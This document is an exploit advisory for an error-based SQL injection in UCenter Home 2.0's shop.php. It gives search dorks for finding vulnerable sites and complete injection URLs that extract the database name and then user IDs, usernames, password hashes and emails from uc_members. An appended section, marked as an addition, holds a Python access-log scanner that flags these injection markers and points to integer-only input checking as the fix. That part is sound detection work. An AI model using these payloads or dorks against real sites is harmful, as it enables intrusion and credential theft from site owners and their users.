__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Use hex conversion, then edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
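
Added example, not part of the original advisory: a log check for the request shape shown above, flagging shop.php requests whose shopid is not a plain integer and labelling those that carry the error-based markers (floor(rand(..)), group by, information_schema, count(*)). The combined log format, the function names, the sample lines and the premise that a legitimate shopid is always numeric are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log (the format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
# SQL fragments that together make up the duplicate-key error technique
# visible in the advisory's requests.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"group\s+by",
    r"information_schema", r"count\s*\(\s*\*\s*\)")]

def classify(line):
    """Return None, 'non-numeric-shopid' or 'error-based-sqli' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    verdict = None
    # parse_qs percent-decodes, so %20-encoded payloads are matched too.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumed legitimate form: a plain integer id
        if sum(1 for rx in MARKERS if rx.search(value)) >= 2:
            return "error-based-sqli"
        verdict = "non-numeric-shopid"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2011:10:00:01 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2011:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '203.0.113.5 - - [01/Jan/2011:10:00:12 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(number, verdict)
```

The same integer-only rule applied server-side to shopid before it reaches the query is the corresponding fix; the log check only finds attempts after the fact.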